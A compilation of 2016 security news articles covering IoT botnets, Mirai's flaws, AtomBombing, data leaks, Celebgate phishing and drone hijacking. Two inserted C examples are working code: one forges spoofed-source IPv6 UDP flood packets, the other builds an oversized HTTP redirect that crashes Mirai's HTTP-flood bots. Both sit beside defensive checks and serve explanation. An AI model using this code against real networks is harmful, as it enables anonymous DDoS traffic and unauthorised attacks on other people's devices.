According to the Australian Red Cross Blood Service, the database contains registration information for 550,000 individuals who had donated between 2010 and 2016.
“This file contained registration information of 550,000 donors made between 2010 and 2016. The file was part of an online application to give blood and information such as names, addresses, dates of birth and some personal details are included in the questionnaire.” states the announcement published by the organization.
It is still unclear whether anyone else accessed the database; in any case IDCARE, Australia and New Zealand’s national identity support service, has assessed the risk to donors as low.
MalwareMustDie spotted a new IoT Linux/IRCTelnet malware made in Italy
30.10.2016 securityaffairs Virus
Exclusive: the security research group MalwareMustDie has found a new Linux/IRCTelnet malware, made in Italy, that targets IoT devices, controls them over IRC and spreads over Telnet. It is able to generate IPv6 DDoS traffic and has new dangerous capabilities that Mirai lacked.
In a brief interview with Security Affairs, @unixfreaxjp of the MalwareMustDie group explains the main characteristics of the malware, so that it can be fought with proper security awareness.
After the Mirai escalation it has become clear that the new, very lucrative DDoS landscape will be populated more and more by IoT devices: “things” that are normally shipped without adequate quality control and are compromised through flaws that are easy to exploit.
Moreover, in recent times we have learned that IoT devices are often rooted by brute-force attacks, which succeed because the devices are deployed, as we said elsewhere, without changing the default credentials.
This was exactly Mirai’s scheme, as described in past articles.
However, what we have here is something new, described in detail in the latest post by the now world-famous white-hat researcher who discovered and reverse engineered the Mirai malware, @unixfreaxjp of the MalwareMustDie group.
In his post he specifies that the new IRC botnet ELF malware does follow the Tsunami/Kaiten protocol specification, but is written “in a different way adding some more features in messaging and malicious/attack vectors used”.
An explosive mix of new and classic features in this new made-in-Italy IRC botnet ELF malware
Here is an outline of the key points of the new Linux/IRCTelnet malware (the bot client), which has the following characteristics and concepts:
1) it is designed to attack IoT devices over the Telnet protocol; by now IoT is the new Eldorado, we know;
2) it uses a Telnet scanner like those previously seen in GayFgt/Torlus/Lizkebab/Bashdoor/Bashlite, of which we report a reconstructed C code snapshot:
Figure 1 The telnet scanner.
3) it uses the leaked Mirai credential list as a brute-force password dictionary, hardcoded in the binary as shown below:
Figure 2. The bruteforce password dictionary
4) it uses the Kaiten concept (IRC protocol) to receive commands from a malicious C&C IRC server. Below is the log produced by @unixfreaxjp with a PoC implemented to decode the values and behavior of the malware.
Figure 3. The IRC C&C Server log
5) it is made in Italy: among other evidence, there are Italian strings inside the binary, as shown in the next figure. We know that the infection campaign for this botnet started on October 25, 2016.
Figure 4. The Italian messages inside the binary code of the new Linux/IRCTelnet malware.
We want to underline the noble stance of MalwareMustDie, who publicly stated in the blog post that he did not want to include anything referring to Italy in the codename of this new malware.
But let us quickly analyze the new features of the malware, because some of them are utterly new and certainly scary.
The first use of IPv6 to target IoT (and IP spoofing of the bots)
During the reversing phase, a generator of “TCP6” and “UDP6” packets was found inside the new malware, associated with a coded “spoof6” option.
This appears to be the first time IPv6 has been used by IoT malware, and it is now possible to generate spoofed DDoS attacks in which the IP of the infected bot cannot be identified from the packets. One caveat: spoofed packets only reach the target from networks that do not perform source address validation (BCP 38 ingress filtering), so the technique depends on how poorly the bots’ upstream networks are configured.
The reconstructed flooding code looks bad, and it seems that a lot of “DoS attack combinations are planned”.
Figure 5. The DDoS attack sequence of the Linux/IRCTelnet malware
@unixfreaxjp of MalwareMustDie comments on the new IPv6 capability that “this botnet supports (DDoS) attacks with IPv4 and IPv6 packets through the attack generator sending functions called sendV4() and sendV6().” During the attack there is another capability, “spoofing of the IP address can also be done in IPv4 or IPv6 form”, which is really scary.
Below is the IPv6 flood generating function:
Figure 6. Reverse of the flooding generating function on IPv6
So we can say that the focus of this new feature is IPv6 flooding, and the author of the MMD post asks himself, and the whole security research community: “Are we ready to deal with IoT IPv6 DDoS now?”
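The following C is an added example, not code from Linux/IRCTelnet or from MalwareMustDie’s write-up. It shows the two things a “spoof6” option necessarily does (forge the IPv6 source address and recompute the UDP checksum over the IPv6 pseudo-header, since a checksum computed for the real source would be discarded by the target) and, on the other side, the BCP 38 ingress check that makes the forgery fail when the bot’s upstream network actually validates source addresses. The addresses come from the 2001:db8::/32 documentation range, the payload is constructed filler, the function names are ours, and nothing is sent on the wire.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

struct ip6_hdr_raw {            /* RFC 8200 fixed header: 40 bytes, no padding */
    uint32_t ver_tc_flow;       /* version(4) | traffic class(8) | flow label(20) */
    uint16_t payload_len;
    uint8_t  next_header;       /* 17 = UDP */
    uint8_t  hop_limit;
    uint8_t  src[16];
    uint8_t  dst[16];
};

struct udp_hdr_raw { uint16_t sport, dport, len, csum; };   /* 8 bytes */

/* RFC 1071 one's-complement accumulation over big-endian 16-bit words. */
static uint32_t csum_add(uint32_t acc, const uint8_t *p, size_t n)
{
    while (n > 1) { acc += (uint32_t)p[0] << 8 | p[1]; p += 2; n -= 2; }
    if (n) acc += (uint32_t)p[0] << 8;
    return acc;
}

static uint16_t csum_fold(uint32_t acc)
{
    while (acc >> 16) acc = (acc & 0xffff) + (acc >> 16);
    return (uint16_t)~acc;
}

/* UDP checksum over the IPv6 pseudo-header (src, dst, upper-layer length, next
 * header) followed by the UDP header and data. The UDP bytes are taken as they
 * stand: checksum field zeroed when computing, as received when verifying. */
uint16_t udp6_checksum(const struct ip6_hdr_raw *ip, const uint8_t *udp, size_t udp_len)
{
    uint8_t pseudo[40] = {0};
    uint32_t acc;
    memcpy(pseudo, ip->src, 16);
    memcpy(pseudo + 16, ip->dst, 16);
    pseudo[34] = (uint8_t)(udp_len >> 8);
    pseudo[35] = (uint8_t)udp_len;
    pseudo[39] = 17;
    acc = csum_add(0, pseudo, sizeof pseudo);
    acc = csum_add(acc, udp, udp_len);
    return csum_fold(acc);
}

/* Forge a UDP-over-IPv6 datagram whose source is whatever the caller claims.
 * Returns the total length, or 0 if the buffer is too small or an address is bad. */
size_t build_spoofed_udp6(uint8_t *pkt, size_t cap, const char *spoofed_src,
                          const char *dst, uint16_t sport, uint16_t dport,
                          const uint8_t *data, size_t data_len)
{
    struct ip6_hdr_raw ip;
    struct udp_hdr_raw uh;
    size_t udp_len = sizeof uh + data_len, total = sizeof ip + udp_len;
    uint16_t c;
    if (total > cap || udp_len > 0xffff) return 0;
    memset(&ip, 0, sizeof ip);
    ip.ver_tc_flow = htonl(6u << 28);
    ip.payload_len = htons((uint16_t)udp_len);
    ip.next_header = 17;
    ip.hop_limit   = 64;
    if (inet_pton(AF_INET6, spoofed_src, ip.src) != 1 ||
        inet_pton(AF_INET6, dst, ip.dst) != 1)
        return 0;
    uh.sport = htons(sport); uh.dport = htons(dport);
    uh.len   = htons((uint16_t)udp_len); uh.csum = 0;
    memcpy(pkt, &ip, sizeof ip);
    memcpy(pkt + sizeof ip, &uh, sizeof uh);
    memcpy(pkt + sizeof ip + sizeof uh, data, data_len);
    /* The checksum covers the pseudo-header, so it must be recomputed for the forged source. */
    c = udp6_checksum(&ip, pkt + sizeof ip, udp_len);
    if (c == 0) c = 0xffff;     /* UDP over IPv6 never carries a zero checksum */
    pkt[sizeof ip + 6] = (uint8_t)(c >> 8);
    pkt[sizeof ip + 7] = (uint8_t)c;
    return total;
}

/* Receiver-side verification: summing the datagram as received must give zero. */
int udp6_checksum_ok(const uint8_t *pkt, size_t len)
{
    struct ip6_hdr_raw ip;
    size_t udp_len;
    if (len < sizeof ip + sizeof(struct udp_hdr_raw)) return 0;
    memcpy(&ip, pkt, sizeof ip);
    udp_len = ntohs(ip.payload_len);
    if (ip.next_header != 17 || sizeof ip + udp_len != len) return 0;
    return udp6_checksum(&ip, pkt + sizeof ip, udp_len) == 0;
}

/* BCP 38 (RFC 2827) source address validation at the bot's upstream edge: the
 * packet passes only if its source lies inside the prefix assigned to that
 * interface. A forged source outside the prefix is dropped and never reaches the target. */
int ingress_source_allowed(const uint8_t *pkt, size_t len, const char *prefix, unsigned plen)
{
    uint8_t net[16];
    unsigned i;
    if (len < 40 || plen > 128 || inet_pton(AF_INET6, prefix, net) != 1) return 0;
    for (i = 0; i < plen; i++) {
        unsigned byte = i / 8, bit = 7 - (i % 8);
        if (((pkt[8 + byte] >> bit) & 1) != ((net[byte] >> bit) & 1)) return 0; /* src at offset 8 */
    }
    return 1;
}

int main(void)
{
    uint8_t pkt[128];
    static const uint8_t filler[16] = "FLOODFLOODFLOOD";   /* constructed payload */
    size_t n = build_spoofed_udp6(pkt, sizeof pkt, "2001:db8:dead::1", "2001:db8:1::53",
                                  40000, 53, filler, sizeof filler);
    printf("%zu-byte datagram, checksum %s\n", n, udp6_checksum_ok(pkt, n) ? "valid" : "bad");
    /* The bot really sits in 2001:db8:cafe::/48, so a BCP 38 filter there drops the forgery. */
    printf("ingress filter 2001:db8:cafe::/48: %s\n",
           ingress_source_allowed(pkt, n, "2001:db8:cafe::", 48) ? "pass" : "DROP");
    return 0;
}
```

The target sees a perfectly valid datagram from 2001:db8:dead::1 and has no way to recover the bot’s real address, which is the point the researcher makes; the only place the forgery can be stopped is the bot’s own upstream network, which is why the IPv6 deployment question is also an ingress-filtering question.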
Figure 7. Reddit discussion on IPv6
This is the big deal of the moment and the challenge of the future; but let’s move on to the interview that @unixfreaxjp of MalwareMustDie gave to Security Affairs a few hours ago.
First question:
Do you think that Linux/IRCTelnet is more dangerous than Mirai?
Mirai is dangerous in its own way: new DDoS attack functions, low awareness, and samples that are hard to fetch. Also, AV vendors were not using Mirai as the new name but stuck with an old malware name, which lowered the security alert response. So when it hit hard, people were surprised.
This Linux/IRCTelnet, if ignored as happened with Mirai, can be a dangerous threat too. This is the first malware run from an IRC C&C that uses a Telnet scanner to infect other IoT devices, and it is aiming at IoT because of the vulnerable vectors there.
So I don’t say Linux/IRCTelnet is more dangerous than Mirai. Each of them has its own dangerous vector; it will depend on us and how we respond to handle this threat.
Second Question:
What are the capabilities of the “IP spoof option in IPv4 or IPv6”?
When an infected IoT device is performing an attack, for example via UDP6 or TCP6, Linux/IRCTelnet has an option to spoof the source IP of the attacker (its own IP) so that the original IP is not revealed in the packets generated to flood the target.
This spoofing, and the attack itself, are also supported over IPv6. This is important since there is no other DDoS botnet yet that is coded and designed to hit services over IPv6.
Third Question:
How do you know that the number of usable bots in this new botnet is about 3,500?
A. I’ll show you a figure:
Fourth Question:
Q. Do you think this malware is originally coded?
A. After further analysis comparing the whole reversed code to historically detected ELF botnet malware, we found a very good match, which confirms that the source code used for this botnet is based on the root of the Aidra botnet. I was not sure about this until I had reversed the whole code and compared it to the historically detected ELF botnet malware libraries, and found a very good match along with several modifications and an overhaul of the original Aidra code. Built on the old code of the legendary Aidra bot, with the new Torlus/Gayfgt logic for the Telnet scanner and Mirai’s leaked list of vulnerable IoT device login credentials, Linux/IRCTelnet is infecting at high speed: it raised almost 3,500 bot clients within only 5 days of its loader first being detected. Indeed, spoofing and IPv6 were designed into, and are a trademark of, the Aidra botnet family, and a new version of this botnet built for the current vulnerable threat landscape is really bad news. All of the reversed details stand; I had reversed the malware BEFORE I even knew this fact. It is very surprising to see a new type of Aidra botnet in this era, and this botnet is really a redesigned and modified old Aidra that makes up a brand new threat landscape we face now.
This is the log of the IRC server; as you can see, 3,486 “users” were connected at that time.
Mirai Botnet Itself is Flawed; Hacking Back IoTs Could Mitigate DDoS Attacks
29.10.2016 thehackernews Attack
The infamous botnet that was used in the recent massive distributed denial of service (DDoS) attacks against the popular DNS provider Dyn, causing a vast Internet outage last Friday, is itself flawed.
Yes, the Mirai malware, which has already enslaved millions of Internet of Things (IoT) devices across 164 countries, contains several vulnerabilities that might be used against it to destroy the botnet's DDoS capabilities and mitigate future attacks.
In early October, the developer of the malware publicly released the source code of Mirai, which is designed to scan for IoT devices – mostly routers, cameras, and DVRs – that are still using their default passwords and then enslave them into a botnet, which is then used to launch DDoS attacks.
However, after a close look at the source code, a researcher discovered three vulnerabilities, one of which can be used to shut down Mirai's ability to flood targets with HTTP requests.
The stack buffer overflow vulnerability was found by Scott Tenaglia, a researcher at endpoint security firm Invincea, in the segment of Mirai's code that carries out HTTP flood attacks.
If exploited, the vulnerability crashes the attack process, terminating the attack from that bot (infected IoT device) but leaving the compromised device intact and running.
Tenaglia has publicly released the exploit, saying it would not have helped in the recent DNS-based DDoS attack against Dyn that rendered major websites inaccessible, but that it would shut down the Layer 7 attack capabilities present in Mirai.
That's because Mirai is capable of launching HTTP floods as well as various network-layer DDoS attacks, including DNS floods, UDP floods, SYN and ACK floods, GRE IP and GRE ETH floods, and STOMP (Simple Text Oriented Message Protocol) floods.
"This simple 'exploit' is an example of active defense against an IoT botnet that could be used by any DDoS mitigation service to guard against a Mirai-based HTTP flood attack in real time," Tenaglia writes in a blog post. "Although it cannot be used to remove the bot from the IoT device, it can be used to halt the attack originating from that particular device."
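The following C is an added illustration, not Mirai's source and not Invincea's proof-of-concept; it serves both the Invincea analysis quoted in the Security Affairs piece above and the summary in this article. It shows the bug class described (a response's Location header copied into a fixed-size stack buffer with no bound) next to a bounded version, and the kind of oversized 302 response a mitigation service would have to hand a flooding client to trigger it. The 256-byte buffer, the function names and the HTTP strings are assumptions for the example.

```c
#include <stdio.h>
#include <string.h>

#define LOC_MAX 256   /* assumed size of the flood client's path buffer */

/* Returns a pointer to the Location header value inside a raw HTTP response,
 * or NULL if there is none. Case-sensitive, which is enough for the example. */
static const char *find_location(const char *resp)
{
    static const char key[] = "\r\nLocation: ";
    const char *h = strstr(resp, key);
    return h ? h + (sizeof key - 1) : NULL;
}

/* Vulnerable pattern: the value is copied into a fixed-size stack buffer until
 * CR/LF with no check against LOC_MAX. A value longer than 255 bytes overwrites
 * the frame; the process dies with SIGSEGV, which is what stops the flood. */
int vuln_follow_redirect(const char *resp)
{
    char loc[LOC_MAX];
    const char *v = find_location(resp);
    size_t i = 0;
    if (!v) return -1;
    while (v[i] != '\r' && v[i] != '\n' && v[i] != '\0') {
        loc[i] = v[i];              /* unbounded write */
        i++;
    }
    loc[i] = '\0';
    return (int)i;
}

/* Hardened pattern: measure first, refuse anything that does not fit, copy once. */
int safe_follow_redirect(const char *resp, char *out, size_t out_len)
{
    const char *v = find_location(resp);
    size_t n;
    if (!v || out_len == 0) return -1;
    n = strcspn(v, "\r\n");         /* value ends at the first CR or LF */
    if (n >= out_len) return -1;    /* reject rather than silently truncate */
    memcpy(out, v, n);
    out[n] = '\0';
    return (int)n;
}

/* What a mitigation service could answer a flooding client with: a 302 whose
 * Location value is value_len bytes of filler. Returns bytes written (without
 * the terminating NUL), or 0 if buf is too small. */
size_t build_oversized_redirect(size_t value_len, char *buf, size_t buf_len)
{
    static const char head[] = "HTTP/1.1 302 Found\r\nLocation: ";
    static const char tail[] = "\r\nContent-Length: 0\r\n\r\n";
    size_t hl = sizeof head - 1, tl = sizeof tail - 1;
    if (hl + value_len + tl + 1 > buf_len) return 0;
    memcpy(buf, head, hl);
    memset(buf + hl, 'A', value_len);
    memcpy(buf + hl + value_len, tail, tl + 1);   /* copies the NUL too */
    return hl + value_len + tl;
}

int main(void)
{
    char resp[4096], out[LOC_MAX];
    size_t n = build_oversized_redirect(2048, resp, sizeof resp);
    printf("crafted response: %zu bytes\n", n);
    printf("bounded parser result: %d (negative = rejected)\n",
           safe_follow_redirect(resp, out, sizeof out));
    /* vuln_follow_redirect(resp) here would write 2 KB into a 256-byte frame. */
    return 0;
}
```

Only the bounded parser is ever fed the oversized response in main(); calling vuln_follow_redirect() on it is undefined behaviour and, with a typical stack layout, produces the SIGSEGV the analysis describes. The fix is the usual one for this bug class: know the destination size, compare before copying, and treat an over-long value as an error instead of data.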
Legal Concerns of Hacking Back:
However, exploiting this vulnerability means hacking back a large number of IoT devices, which is a controversial and legally questionable approach that puts defenders in a gray area.
Hacking back involves making changes to systems across various countries without permission from the device's owner, the ISP or the carrier, and Invincea adds a disclaimer to its research saying it is not advocating a counterattack.
But since the flaw can thwart the threat, white-hat vigilantes could quietly use it to kill the HTTP flood processes on Mirai-infected devices, even though the bots themselves stay in place.
As we have seen in numerous court-ordered botnet takedowns in the past, authorities could obtain a court order and hack back Mirai-compromised devices in order to shut the infamous botnet down.
The DDoS attack that hit French Internet service and hosting provider OVH with 1.1 Tbps of junk traffic, which is the largest DDoS attack known to date, also came from Mirai bots.
Ukrainian hackers Cyber Hunta leaked emails of Putin’s Advisor
29.10.2016 securityaffairs Hacking
Hackers of the Cyber Hunta collective leaked thousands of emails allegedly stolen from the account of Vladislav Yuryevich Surkov.
Last week a Russian government website was hacked by the hacker known as The Jester, who defaced the website of the Russian Ministry of Foreign Affairs, MID.ru, in retaliation for the recent attacks against US targets.
This week a Ukrainian hacker collective called “Cyber Hunta” released a cache of emails linked to the Kremlin’s Vladislav Surkov, also known as the grey cardinal.
Cyber Hunta is a group of hacktivists that operates against external threat actors and “internal enemies.”
The group claims to have breached the internal networks of the Russian presidential administration and the Parliament.
Experts from the Atlantic Council’s Digital Forensic Research Lab who analyzed the Surkov leaks confirmed that the email account hacked by the attackers, prm_surkova@gov.ru, was apparently managed by Surkov’s assistants.
“The hacked inbox was for prm_surkova@gov.ru, which was handled by his secretaries or assistants, including a “Masha” (Mariya) and “Yevgenia” (last names unclear). The majority of the emails are briefings from Surkov’s assistants, such as Aleksandr Pavlov. ” states the Atlantic Council’s Digital Forensic Research Lab.
For its part, the Russian government denied that the leaked emails belong to Surkov, stating that he does not use email.
According to the Ukrainian security service, the SBU, the leaked emails are genuine; the Associated Press, which analyzed the leaked emails, shares the same opinion.
The Ukrainian hackers leaked a 1 GB Outlook data file (.pst) containing 2,337 messages. Some messages contain information about current internal political developments in the Republic of Abkhazia, the Republic of South Ossetia, Ukraine, and the Republic of Moldova.
The archive includes email messages related to the war in Donbass, including government expense data and a list of casualties. The messages also show connections between the Russian government and the pro-Russia separatists operating in eastern Ukraine to destabilize the Ukrainian government.
Who is behind Cyber Hunta? Is the group linked to a government opposed to the Kremlin? Which one?
Perhaps in time we will have some answers.
Michigan State University hacked, personal information leaked online
29.10.2016 securityaffairs Hacking
The young hacker Mys7erioN claims to have hacked into a database of a US organization, Michigan State University, and leaked data online.
Today I was contacted via Twitter by Mys7erioN, who told me he had hacked into a database of a US organization, Michigan State University.
As proof of the hack, Mys7erioN published on Pastebin the records of a table containing user data, including names, logins, phone numbers, email addresses and encrypted passwords.
Mys7erioN is a young hacker; he told me he is 17 years old, from the Netherlands, and studying IT security at school.
He was scanning some websites when he discovered an SQL injection vulnerability in the systems of Michigan State University.
The following image shows the list of tables included in the hacked database.
One of the tables, “gelstaff_mp2016”, seems to be an up-to-date list of users. The hacker also published it on Pastebin: roughly 500 personal records and 222 logins in total.
This isn’t the first time Michigan State University has been hacked: in 2012 the hacker DARWINARE published approximately 1,500 names, email addresses, encrypted passwords, user IDs and mailing addresses stolen from the university.
New Privacy Rules require ISPs to Ask you before Sharing your Sensitive Data
28.10.2016 thehackernews Privacy
Good news for privacy-conscious people! Your online data will no longer be marketed for business, at least not by your Internet Service Provider (ISP).
Yes, it's time for ISPs to ask your permission before sharing your sensitive data for marketing or advertising purposes, the FCC rules.
On Thursday, the United States Federal Communications Commission (FCC) imposed new privacy rules on Internet Service Providers (ISPs) that restrict them from sharing your online history with third parties without your consent.
In a 3-2 vote, the FCC approved the new rules, which pleased many privacy advocates, although some wanted the Commission to apply the same rules to web-based services like Google and Facebook as well.
Initially proposed earlier this year, the new rule says: "ISPs are required to obtain affirmative 'opt-in' consent from consumers to use and share sensitive information."
What does 'sensitive' information mean here? The rule lists the following:
Your precise geo-location
Your children's information
Information about your health
Your financial data
Social Security Numbers (SSNs)
Your Web browsing history
App usage history
The content of your communication
Note: your broadband provider can still use and share this information if you give explicit permission, so watch out for those invitations and gently worded dialog boxes.
Non-sensitive information includes your email address, service tier, IP address, bandwidth used and similar data, but you can still officially opt out of its sharing.
The new rule also requires Internet providers to tell customers with "clear, conspicuous and persistent notice" about the information they are collecting on them and how/when they share it, and the "types of entities" they share it with.
ISPs also need to notify their customers in the event of a data breach.
The FCC aims to provide consumers an increased choice, transparency, and security online over their personal information. Here's what the Commission writes:
"ISPs serve as a consumer's "on-ramp" to the Internet. Providers have the ability to see a tremendous amount of their customers' personal information that passes over that Internet connection, including their browsing habits. Consumers deserve the right to decide how that information is used and shared — and to protect their privacy and their children's privacy online."
Meanwhile, the advertisers are, of course, not at all happy with the FCC's move. The Association of National Advertisers called the new rules "unprecedented, misguided and extremely harmful," saying the move is bad for consumers as well as the U.S. economy.
However, ISPs have a year to comply with the new rules, so they won't take effect for at least a year.
This Code Injection Technique can Potentially Attack All Versions of Windows
28.10.2016 thehackernews Vulnerebility
Guess what? If you own a fully patched Windows PC, attackers can still get malicious code running inside its legitimate processes.
Isn't that scary? Well, definitely for most of you.
Security researchers have discovered a new technique that could allow attackers to inject malicious code into every version of Microsoft's Windows operating system, even Windows 10, in a manner that existing anti-malware tools do not detect, threatening millions of PCs worldwide.
Dubbed "AtomBombing," the technique does not exploit any vulnerability but abuses a design weakness in Windows.
New Code Injection Attack helps Malware Bypass Security Measures
The AtomBombing attack abuses the system-level atom tables, a Windows feature that allows applications to store strings, objects, and other types of data that they need to access regularly.
Since atom tables are shared, all sorts of applications can access or modify data inside them. You can read a more detailed explanation of atom tables in Microsoft's documentation.
A team of researchers from cyber security company enSilo, who came up with the AtomBombing technique, say this design flaw in Windows allows malicious code to be written into an atom table and a legitimate app to be tricked into retrieving it and executing malicious actions on the attacker's behalf.
Once injected into legitimate processes, malware can more easily bypass the security mechanisms that protect such systems from infection, the researchers said.
AtomBombing can Perform MITM Browser attack, Decrypt Passwords, and More
Besides bypassing process-level restrictions, the AtomBombing code injection technique also allows attackers to perform man-in-the-middle (MITM) browser attacks, remotely take screenshots of targeted users' desktops, and access encrypted passwords stored in a browser.
Google Chrome encrypts your saved passwords using the Windows Data Protection API (DPAPI), which derives its key material from the current user, so any process running as that user can decrypt the data and read the passwords.
So, if malware is injected into a process already running in the context of the current user, it can read those passwords in plain text.
Moreover, by injecting code into a web browser, attackers can modify the content shown to the user.
"For example, in a banking transaction process, the customer will always be shown the exact payment information as the customer intended via confirmation screens," said Tal Liberman, Security Research Team Leader of enSilo.
"However, the attacker modifies the data so that the bank receives false transaction information in favor of the attacker, i.e. a different destination account number and possibly amount."
No Patch for AtomBombing Attack
What's worse, the company said all versions of Windows, including Microsoft's newest Windows 10, are affected. And what's even worse: there is no fix at this moment.
"Unfortunately, this issue cannot be patched since it does not rely on broken or flawed code – rather on how these operating system mechanisms are designed," said Liberman.
Since the AtomBombing technique uses legitimate operating system functions to carry out the attack, Microsoft cannot patch it without changing how the mechanism itself works, so there is no notion of a patch. Note, however, that the technique requires the attacker to already have code running on the machine: it is a way of hiding and extending malware that is already present, not a way in, so the usual controls against getting malware onto the box in the first place still apply.
AtomBombing Code Injection can potentially hack all Windows OS versions
28.10.2016 securityaffairs Vulnerebility
Researchers from enSilo have devised a method, called AtomBombing, to inject malicious code into Windows in a way that bypasses modern anti-malware tools.
Security experts from enSilo have devised a method, called AtomBombing, to inject malicious code into the Windows operating system in a way that modern anti-malware tools do not detect.
Atom tables are data structures used by the operating system to store strings together with an identifier used to access them; they can have global or local scope.
“An atom table is a system-defined table that stores strings and corresponding identifiers. An application places a string in an atom table and receives a 16-bit integer, called an atom, that can be used to access the string. A string that has been placed in an atom table is called an atom name.” reads a description published by Microsoft on the Atom Tables.
“The system provides a number of atom tables. Each atom table serves a different purpose. For example, Dynamic Data Exchange (DDE) applications use the global atom table to share item-name and topic-name strings with other applications.”
AtomBombing Code Injection
The attackers write malicious code into an atom table and force a legitimate application to retrieve it from the table. Once the legitimate application has retrieved the code, the attacker manipulates the application so that the malicious code is executed.
“Our research team has uncovered a new way to leverage mechanisms of the underlying Windows operating system in order to inject malicious code. Threat actors can use this technique, which exists by design of the operating system, to bypass current security solutions that attempt to prevent infection. We named this technique AtomBombing based on the name of the underlying mechanism that this technique exploits.” states the analysis published by enSilo.
The researchers explained that the AtomBombing technique still relies on first tricking a user into running a malicious executable; from there it enables several malicious activities, including memory data snooping to grab passwords and other sensitive information.
The experts highlighted that the AtomBombing method doesn’t exploit a flaw in the OS code; instead, it relies on a mechanism that Windows implements by design.
“Unfortunately, this issue cannot be patched since it doesn’t rely on broken or flawed code – rather on how these operating system mechanisms are designed.”
Crime doesn’t pay, Fappening hacker gets 18 months in jail
28.10.2016 securityaffairs Crime
The person behind the Fappening case, Ryan Collins (36), received a lighter penalty than the five-year prison term initially on the table for his guilty plea.
Do you remember the Fappening case? In 2014, a cache of nude photos and videos of celebrities was leaked online; hackers had stolen them by accessing the victims’ iCloud accounts.
The list of victims is long and includes Jennifer Lawrence and Kim Kardashian; the hacker stole the celebrities’ private images, and their nude photos were leaked onto 4chan.
In March the US Department of Justice (DoJ) announced the arrest of the alleged culprit in the Fappening case, charging Ryan Collins (36), of Pennsylvania, with hacking Apple and Google email accounts belonging to more than 100 people, mostly celebrities.
“A Pennsylvania man was charged today with felony computer hacking related to a phishing scheme that gave him illegal access to over 100 Apple and Google e-mail accounts, including those belonging to members of the entertainment industry in Los Angeles.” states the press release issued by the DoJ.
He was charged with hacking 50 iCloud and 72 Gmail accounts, mostly owned by Hollywood stars.
Collins admitted his responsibility and signed a plea agreement to plead guilty to a felony violation of the Computer Fraud and Abuse Act.
The man sent spear-phishing emails to the victims from November 2012 until the beginning of September 2014. In this way he obtained login credentials from his victims, then illegally accessed their email accounts to retrieve sensitive and personal information.
The man behind the Fappening case focused his efforts on accessing nude pictures and videos of the victims; the DoJ announcement also revealed that in some cases he used a software program to download the entire contents of the victims’ Apple iCloud backups.
In July, authorities also arrested a second man, Edward Majerczyk (28), who was charged with hacking 300 iCloud and Gmail accounts, 30 of which belonged to celebrities.
Between them, Majerczyk and Collins hacked some 600 victims; both pleaded guilty to charges involving phishing attacks in which they sent emails purporting to come from Apple and Google.
Collins received 18 months, a lighter penalty than the five-year prison term initially on the table for his guilty plea.
The identity of the person who leaked the images is still a mystery.
'Celebgate' Hacker Gets 18 Months in Prison for Hacking Celebrity Nude Photos
28.10.2016 thehackernews Crime
The hacker who stole nude photographs of female celebrities two years ago in a massive data breach — famous as "The Fappening" or "Celebgate" scandal — has finally been sentenced to 18 months in federal prison, authorities said on Thursday.
36-year-old Lancaster, Pennsylvania man Ryan Collins was arrested in March and charged with hacking into "at least 50 iCloud accounts and 72 Gmail accounts," most of which were owned by Hollywood stars, including Jennifer Lawrence, Kim Kardashian, and Kate Upton.
Now a judge in Harrisburg, Pennsylvania, on Wednesday sentenced Collins to 18 months in federal prison for violating the Computer Fraud and Abuse Act.
Here's How Collins Stole Celebrities' Nude Photos
Federal prosecutors said Collins ran a phishing scheme between November 2012 and September 2014 and compromised more than 100 people's accounts using fake emails disguised as official notifications from Google and Apple, asking victims for their account credentials.
"When the victims responded, Collins then had access to the victims' e-mail accounts. After illegally accessing the e-mail accounts, Collins obtained personal information including nude photographs and videos," the Justice Department said in a statement.
"In some instances, Collins would use a software program to download the entire contents of the victims' Apple iCloud backups. In addition, Collins ran a modeling scam in which he tricked his victims into sending him nude photographs."
Many of the compromised accounts belonged to famous female celebrities including Jennifer Lawrence, Kim Kardashian, Kate Upton, Kirsten Dunst, Aubrey Plaza, Rihanna, Avril Lavigne and Gabrielle Union.
Another suspect, Edward Majerczyk, 28, of Illinois, pleaded guilty in July to charges of hacking 300 Gmail and iCloud accounts. However, authorities have yet to identify the uploader or 'leaker' of the photographs stolen by Collins and Majerczyk.
According to officials, Collins and Majerczyk hacked over 600 victims with their social engineering tricks.
Collins faced a maximum of five years in prison, but as part of his plea deal, prosecutors proposed a lighter sentence of only 18 months.
You Can Hijack Nearly Any Drone Mid-flight Using This Tiny Gadget
28.10.2016 thehackernews Hacking
Now you can hijack nearly any drone mid-flight just by using a tiny gadget.
Security researcher Jonathan Andersson has devised a small hardware device, dubbed Icarus, that can hijack a variety of popular drones mid-flight, allowing an attacker to lock the owner out and take complete control of the device.
Andersson, who is the manager of Trend Micro's TippingPoint DVLab division, demonstrated this new hack at this year's PacSec security conference in Tokyo, Japan on Wednesday.
Besides drones, the new gadget is capable of fully hijacking a wide variety of radio-controlled devices, including helicopters, cars, boats and other remote-controlled gear that runs over the most popular wireless transmission control protocol, called DSMx.
DSMx is a protocol used to facilitate communication between radio controllers and devices, including drones, helicopters, and cars.
This is not the first hardware that can hijack drones mid-flight. There are jamming devices available in the market that block controlling radio signals and render a drone useless. However, these devices do not give you control like Icarus does.
Icarus works by exploiting the DSMx protocol, granting attackers complete control over target drones, which allows them to steer, accelerate, brake and even crash them.
The loophole relies on the fact that the DSMx protocol does not encrypt the 'secret' key that pairs a controller with a hobbyist device, so it is possible for an attacker to recover this secret key by brute force, Andersson explained in his presentation.
Once the drone hijacker, Icarus box, grabs the key, an attacker can send malicious packets to restrict the original owner of the drone from sending legitimate control commands. Instead, the drone will accept commands from the attacker.
You can also watch the demonstration video to learn more about Icarus box.
There is little users can do to mitigate this issue; the affected manufacturers are releasing patches and updated hardware, and working to add encryption to the industry-wide protocol in future drones.
"My guess is that it will not be easy to completely remedy the situation. The manufacturers and partners in the ecosystem sell standalone radio transmitters, models of all kinds, transmitters that come with models and standalone receivers," Andersson told Ars Technica.
"Only a certain set of standalone transmitters have a firmware upgrade capability, though the fix is needed on the model/receiver side."
Icarus has not been made available for sale, but this kind of gadget could benefit law enforcement as well as people who are worried about their safety and privacy. However, the same device could also be used for nefarious purposes.
So, the next time an annoying drone flies overhead? Just hijack it and land it safely, rather than shooting it down.
The Icarus box is able to hijack nearly any drone mid-flight
28.10.2016 thehackernews Hacking
A security researcher presented a small hardware device named the Icarus box that is able to hijack a variety of popular drones mid-flight.
